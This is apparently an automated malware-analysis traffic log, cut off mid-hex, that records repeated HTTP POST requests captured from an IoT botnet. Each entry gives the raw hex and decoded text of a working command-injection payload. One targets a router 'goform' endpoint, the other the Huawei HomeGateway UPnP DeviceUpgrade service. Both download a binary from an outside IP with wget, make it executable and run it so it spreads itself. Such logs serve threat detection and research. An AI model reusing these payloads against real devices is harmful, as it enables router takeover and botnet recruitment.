                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 